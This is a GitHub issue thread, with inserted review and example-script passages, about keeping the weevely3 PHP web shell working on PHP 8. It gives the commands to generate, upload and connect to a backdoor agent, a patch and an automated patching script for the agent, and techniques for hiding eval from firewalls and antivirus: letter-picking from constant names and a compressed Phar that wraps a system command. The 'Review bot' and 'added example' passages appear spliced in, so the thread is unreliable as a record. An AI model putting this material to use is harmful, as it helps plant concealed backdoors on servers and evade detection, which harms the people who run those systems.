epinna / weevely3

Weaponized web shell
GNU General Public License v3.0

PHP8 - The remote script execution triggers an error 500, check script and payload integrity #151

Closed dvanmosselbeen closed 1 year ago

dvanmosselbeen commented 3 years ago

Hi there,

After generating the PHP backdoor, uploading it and then connecting to it, I get the following non-blocking error message when the shell connects:

The remote script execution triggers an error 500, check script and payload integrity

However, it seems to work as expected. I tried several times and this error still pops up. I am following a course online and saw other people have that same error, so I was thinking this is maybe a little bug.

Using version 4.0.1-1 from the latest and up to date Kali distribution.

Kind regards & thanks for this sweet tool

lazypip commented 3 years ago

I got the same problem only with PHP 8. So I think there may be several measures applied in the newest PHP version.

epinna commented 3 years ago

I confirm that PHP 8 removed create_function, breaking the PHP agent.

Ghazavizade commented 2 years ago

Hi there, I tried it on the latest version of Kali with PHP 7.3 but I still have this problem. Fortunately the shell works completely fine; the problem is that this error is so annoying. Why does this happen exactly? Is there any quick fix or complete fix for this issue?

LachlanArthur commented 2 years ago

To generate an agent that works with PHP 8+:

Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).

Change a line in the agent to swap curly braces to square ones:

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...
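Review bot: the swap is the right fix, and it is backward compatible: curly-brace string offsets were deprecated in PHP 7.4 and removed in 8.0, while the square-bracket form `$t[$i]` is accepted by every PHP version this agent targets, so nothing is lost on older hosts. Before uploading, check the rest of the generated file for the same `$var{...}` pattern; this hunk only shows the one occurrence in the XOR loop.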
0bskure commented 2 years ago

I confirm that PHP 8 removed create_function, breaking the PHP agent.

call_user_func still exists and works generally the same as create_function did

On an unrelated note, the function names in the PHP agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by PHP functions, such as the array keys for get_defined_constants.

Example with eval:

```php
<?php
// this should return 'eval' on most php versions,
// key 1 of get_defined_constants() is E_RECOVERABLE_ERROR on current builds
$func = strtolower(array_keys(get_defined_constants())[1]);
print($func[0].$func[6].$func[9].$func[11]);
```

There are enough static values located at the same indexes returned from get_defined_constants across most PHP versions to extend this further with other function names.

epinna commented 2 years ago

The purpose of create_function was to execute in-memory PHP code from a dynamic string without leaving visible eval()s in the code. From a quick glance, it does not seem possible to do the same with call_user_func.

archidote commented 2 years ago

I got the same error as you all. :/

nickylivardo commented 2 years ago

To generate an agent that works with PHP 8+:

Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).

Change a line in the agent to swap curly braces to square ones:

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...

it works, thanks

archidote commented 2 years ago

Hello @nickylivardo,

Thanks for your answer! It successfully works!

Below is a step-by-step tutorial:

weevely generate -obfuscator cleartext1_php 123 file.php

nano file.php

  ...
  for($i=0;$i<$l;){
  for($j=0;($j<$c&&$i<$l);$j++,$i++)
  {
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
  }
  }
  ...
weevely http://localhost/file.php 123


++

Archidote
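The three manual steps above (generate with `cleartext1_php`, edit the XOR loop, connect) can be scripted. The following PHP script is an added example, not weevely's own code: it rewrites every `$var{expr}` string offset in a generated agent to `$var[expr]`, reports whether `create_function()` is still present (which means the obfuscator was not disabled at generation time), and round-trips a message through the fixed XOR loop to show that the patched agent decodes exactly as before. The function names and the embedded sample agent fragment are constructed for this example.

```php
<?php
// Added example, not part of weevely. Patches a cleartext1_php agent for PHP 8
// and checks that nothing PHP 8 removed is left behind.
declare(strict_types=1);

// Rewrite $var{expr} (curly-brace string offsets, removed in PHP 8.0) to
// $var[expr]. Only an identifier directly followed by "{" is touched, so
// ordinary code blocks such as "if ($x) {" are left alone.
function rewrite_curly_offsets(string $src): array
{
    $patched = preg_replace('/(\$[A-Za-z_]\w*)\{([^{}]+)\}/', '$1[$2]', $src, -1, $count);
    return [$patched, $count];
}

// Constructs that still break on PHP 8 after the rewrite.
function php8_blockers(string $src): array
{
    $issues = [];
    if (preg_match('/\bcreate_function\s*\(/', $src)) {
        // Only the obfuscating templates emit this; regenerate with
        // "-obfuscator cleartext1_php" instead of trying to patch it.
        $issues[] = 'create_function() present (removed in PHP 8.0)';
    }
    if (preg_match('/\$[A-Za-z_]\w*\{/', $src)) {
        $issues[] = 'curly-brace string offsets remain';
    }
    return $issues;
}

// The agent's XOR loop in the square-bracket form: $t is the payload, $k the
// key, $c the key length, $o the output. Identical semantics on PHP 5, 7 and 8.
function xor_cycle(string $t, string $k): string
{
    $o = '';
    $l = strlen($t);
    $c = strlen($k);
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t[$i] ^ $k[$j];
        }
    }
    return $o;
}

// Constructed sample: the loop exactly as it appears in the generated agent.
$sample = <<<'AGENT'
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
$o.=$t{$i}^$k{$j};
}
}
AGENT;

$target = $argv[1] ?? null;   // optional: php patch_agent.php file.php
$src = $target !== null ? file_get_contents($target) : $sample;

[$patched, $n] = rewrite_curly_offsets($src);
$issues = php8_blockers($patched);

if ($target !== null && $issues === []) {
    file_put_contents($target, $patched);   // write back only when clean
}

echo $patched, "\n";
printf("%d string offset(s) rewritten; %s\n", $n,
    $issues === [] ? 'no PHP 8 blockers left' : implode('; ', $issues));

// Round trip through the fixed loop: XOR with the same key restores the input.
$key = 'secret';
$msg = 'echo PHP_VERSION;';
if (xor_cycle(xor_cycle($msg, $key), $key) !== $msg) {
    throw new RuntimeException('XOR round trip failed');
}
echo "XOR round trip OK\n";
```

Run it without arguments to see the sample fragment patched, or with the path of a freshly generated agent to patch that file in place; it refuses to write back while `create_function()` is still present, because that file was generated with an obfuscator and needs regenerating rather than patching.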

PawelklosPL commented 1 year ago

@archidote @nickylivardo, thx for the answer. For future generations:

This problem still exists in Weevely 4.0.1, PHP version 8.2.2, system Kali Linux.

ZanyMonk commented 1 year ago

The obfpost_php.tpl template is pretty easy to fix, as shown above.

But I feel like there is no alternative to the now defunct create_function: the only alternative would be eval, but the purpose of this obfuscator is to hide the eval call from any WAF/AV in the first place, so using this function to start the deobfuscation process seems odd, if not useless.

We cannot call it from a string (i.e. `$f = "ev"."al"; $f("...");`) because eval is a language construct, not a function.

Does anyone have an idea to save this obfuscator from obsolescence?

Edit: assert could have been a good candidate but it does not evaluate string arguments since 8.0.0, so it's not usable.

Edit 2: it may be possible to use a (compressed) Phar archive to mangle the eval call. Phar support is enabled by default according to the PHP documentation. It works with allow_url_include = Off.

```php
<?php
// Writing a Phar requires phar.readonly=0 (the php.ini default is 1).
$a = new Phar('x.phar');
$a->startBuffering();
$a->addFromString('index.php', "<?php\neval('system(\"id\");');"); // This gets compressed
$a->setStub('<?php
include "phar://".basename(__FILE__)."/index.php";
__HALT_COMPILER();
');
$a->stopBuffering();
$a->compressFiles(Phar::GZ);
```

Result:

```
00000000: 3c3f 7068 700a 696e 636c 7564 6520 2270
..
00000050: 5400 0000 0200 0000 1100 0010 0100 0000  T...............
00000060: 0000 0000 0000 0900 0000 696e 6465 782e  ..........index.
00000070: 7068 701c 0000 002e 4a84 641e 0000 0008  php.....J.d.....
00000080: e929 0db4 1100 0000 0000 0001 0000 0078  .).............x
00000090: 1c00 0000 2e4a 8464 1f00 0000 cc69 d406  .....J.d.....i..
000000a0: b411 0000 0000 0000 b3b1 2fc8 2850 482d  ........../.(PH-
000000b0: 4bcc d150 2fae 2c2e 49cd d550 ca4c 51d2  K..P/.,.I..P.LQ.
000000c0: b456 d7b4 0600 dbbc 51ff 84c6 032f 5def  .V......Q..../].
000000d0: 3317 03f4 d7e9 e879 9ebd 1a70 ca27 f0d2  3......y...p.'..
000000e0: 96b0 eb5b 0072 0202 e90d 9891 bf8f de1a  ...[.r..........
000000f0: dbfa 64d0 14a6 fb5d e8eb dd94 c21f 040f  ..d....]........
00000100: 4abf 877e 9303 0000 0047 424d 42         J..~.....GBMB
```

I created a PR to fix the agent and add a phar obfuscator.
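On the question raised by 0bskure, epinna and ZanyMonk above (whether a dynamically built name, call_user_func, or a constant-derived string can stand in for create_function as a way to reach eval), the following PHP 8 script is an added example, not code from this thread or from weevely. It shows that an assembled name reaches any real function through call_user_func or a variable-function call, but that eval has no function entry at all: function_exists and is_callable both return false and calling the assembled name throws Error. The function names and the `'str'.'rev'` sample are chosen for the example.

```php
<?php
// Added example, not from weevely. Run on PHP 8: php reach_eval.php
declare(strict_types=1);

// A name assembled at runtime (no literal "strrev" in the source) reaches any
// real function, through call_user_func or as a variable function.
function call_assembled(string $left, string $right, ...$args)
{
    $name = $left . $right;
    if (!function_exists($name)) {
        throw new RuntimeException("$name is not a function");
    }
    return call_user_func($name, ...$args);
}

// eval is a language construct, not a function, so the same trick dead-ends:
// no function table entry, not callable, and the call throws Error.
function probe_eval(): array
{
    $name = 'ev' . 'al';
    $result = [
        'function_exists' => function_exists($name),
        'is_callable'     => is_callable($name),
        'error'           => null,
    ];
    try {
        $name('return 1;');            // variable-function call
    } catch (Error $e) {
        $result['error'] = $e->getMessage();   // "Call to undefined function eval()"
    }
    return $result;
}

// 0bskure's constant-index trick, kept as a check rather than a payload: key 1
// of get_defined_constants() is E_RECOVERABLE_ERROR on current builds, and the
// four picked characters spell "eval"; the string is still not callable.
function constant_derived_name(): string
{
    $keys = array_keys(get_defined_constants());
    $first = strtolower($keys[1] ?? '');
    // guard so a build with a different constant order does not index past the end
    return strlen($first) > 11 ? $first[0] . $first[6] . $first[9] . $first[11] : '';
}

echo call_assembled('str', 'rev', 'php8'), "\n";            // 8php
var_export(probe_eval());
echo "\n";
$derived = constant_derived_name();
echo "constant-derived name: ", var_export($derived, true),
     " callable: ", var_export(is_callable($derived), true), "\n";
```

The practical consequence for the agent templates is the one ZanyMonk draws: on PHP 8 the only things that execute a string are a literal eval in the file or an include of a stream, which is what the Phar stub above relies on.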

aatif007 commented 4 weeks ago

Thanks for the answer. For future generations:

This problem still exists in Weevely 4.0.1, PHP version 8.2.2, system Kali Linux.

@ZanyMonk please help me.


Please help me, I have been stuck for the last 3 days. @LachlanArthur @PawelklosPL @dvanmosselbeen @ZanyMonk @epinna